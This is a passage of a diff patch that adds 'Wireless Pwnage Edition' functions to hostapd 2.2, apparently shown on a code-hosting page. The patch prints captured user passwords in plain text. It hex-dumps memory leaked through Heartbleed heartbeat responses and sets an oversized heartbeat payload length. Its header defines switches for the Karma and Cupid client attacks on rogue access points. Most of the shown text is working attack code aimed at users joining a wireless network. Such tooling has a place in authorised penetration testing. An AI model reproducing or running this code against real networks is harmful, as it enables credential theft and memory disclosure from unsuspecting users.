+ wpe_log_file_and_stdout("\t password:\t");
+ for (x=0; x<password_len; x++)
+ wpe_log_file_and_stdout("%c",password[x]);
+ wpe_log_file_and_stdout("\n");
+}
+
+/*
+ Taken from asleap, who took from nmap, who took from tcpdump :)
+*/
+void wpe_hexdump(unsigned char *bp, unsigned int length)
+{
+
+ /* stolen from tcpdump, then kludged extensively */
+
+ static const char asciify[] =
+ "................................ !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~.................................................................................................................................";
+
+ const unsigned short *sp;
+ const unsigned char *ap;
+ unsigned int i, j;
+ int nshorts, nshorts2;
+ int padding;
+
+ wpe_log_file_and_stdout("\n\t");
+ padding = 0;
+ sp = (unsigned short *)bp;
+ ap = (unsigned char *)bp;
+ nshorts = (unsigned int)length / sizeof(unsigned short);
+ nshorts2 = (unsigned int)length / sizeof(unsigned short);
+ i = 0;
+ j = 0;
+ while (1) {
+ while (--nshorts >= 0) {
+ wpe_log_file_and_stdout(" %04x", ntohs(*sp));
+ sp++;
+ if ((++i % 8) == 0)
+ break;
+ }
+ if (nshorts < 0) {
+ if ((length & 1) && (((i - 1) % 8) != 0)) {
+ wpe_log_file_and_stdout(" %02x ", *(unsigned char *)sp);
+ padding++;
+ }
+ nshorts = (8 - (nshorts2 - nshorts));
+ while (--nshorts >= 0) {
+ wpe_log_file_and_stdout(" ");
+ }
+ if (!padding)
+ wpe_log_file_and_stdout(" ");
+ }
+ wpe_log_file_and_stdout(" ");
+
+ while (--nshorts2 >= 0) {
+ wpe_log_file_and_stdout("%c%c", asciify[*ap], asciify[*(ap + 1)]);
+ ap += 2;
+ if ((++j % 8) == 0) {
+ wpe_log_file_and_stdout("\n\t");
+ break;
+ }
+ }
+ if (nshorts2 < 0) {
+ if ((length & 1) && (((j - 1) % 8) != 0)) {
+ wpe_log_file_and_stdout("%c", asciify[*ap]);
+ }
+ break;
+ }
+ }
+ if ((length & 1) && (((i - 1) % 8) == 0)) {
+ wpe_log_file_and_stdout(" %02x", *(unsigned char *)sp);
+ wpe_log_file_and_stdout(" %c",
+ asciify[*ap]);
+ }
+ wpe_log_file_and_stdout("\n");
+}
+
+void wpe_hb_cb(int v_write_p, int v_version, int v_content_type, const void* v_buf, size_t v_len, SSL* v_ssl, void* v_arg) {
+ if (v_content_type == TLS1_RT_HEARTBEAT) {
+ wpe_log_file_and_stdout("\n\nHeartbleed Data:\n");
+ v_ssl->tlsext_hb_pending = 1;
+ wpe_hexdump((unsigned char *)v_buf, v_len);
+ }
+}
+
+
+char *wpe_hb_clear() {
+ char *p;
+ // set payload size
+ p = &wpe_hb_msg[sizeof(wpe_hb_msg) - 3];
+ s2n(wpe_conf.wpe_hb_payload_size, p);
+
+ return wpe_hb_msg;
+}
+
diff -rupN hostapd-2.2/src/wpe/wpe.h hostapd-2.2-wpe/src/wpe/wpe.h
--- hostapd-2.2/src/wpe/wpe.h 1969-12-31 19:00:00.000000000 -0500
+++ hostapd-2.2-wpe/src/wpe/wpe.h 2014-08-14 08:45:54.657127982 -0400
@@ -0,0 +1,50 @@
+/*
+ wpe.h -
+ brad.antoniewicz@foundstone.com
+ Implements WPE (Wireless Pwnage Edition) functionality within
+ hostapd.
+
+ WPE functionality focuses on targeting connecting users. At
+ it's core it implements credential logging (originally
+ implemented in FreeRADIUS-WPE), but also includes other patches
+ for other client attacks.
+
+ FreeRADIUS-WPE: https://github.com/brad-anton/freeradius-wpe
+ Karma patch: http://foofus.net/goons/jmk/tools/hostapd-1.0-karma.diff
+ Cupid patch: https://github.com/lgrangeia/cupid/blob/master/patch-hostapd
+*/
+#include <openssl/ssl.h>
+
+struct wpe_config {
+ char *wpe_logfile;
+ FILE *wpe_logfile_fp;
+ unsigned int wpe_enable_karma;
+ unsigned int wpe_enable_cupid;
+ unsigned int wpe_enable_return_success;
+ unsigned int wpe_hb_send_before_handshake:1;
+ unsigned int wpe_hb_send_before_appdata:1;
+ unsigned int wpe_hb_send_after_appdata:1;
+ unsigned int wpe_hb_payload_size;
+ unsigned int wpe_hb_num_tries;
+ unsigned int wpe_hb_num_repeats;
+};
+
+extern struct wpe_config wpe_conf;
+
+extern char wpe_hb_msg[];
+extern size_t wpe_hb_msg_len;
+
+//#define WPE_HB_MSG_LEN 8
+
+#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \
+ (((unsigned int)(c[1])) )),c+=2)
+
+#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \
+ c[1]=(unsigned char)(((s) )&0xff)),c+=2)
+
+
+void wpe_log_file_and_stdout(char const *fmt, ...);
+void wpe_log_chalresp(char *type, const u8 *username, size_t username_len, const u8 *challenge, size_t challenge_len, const u8 *response, size_t response_len);
+void wpe_log_basic(char *type, const u8 *username, size_t username_len, const u8 *password, size_t password_len);
+void wpe_hb_cb(int v_write_p, int v_version, int v_content_type, const void* v_buf, size_t v_len, SSL* v_ssl, void* v_arg);
+char *wpe_hb_clear();
Reference in a new issue View git blame Copy permalink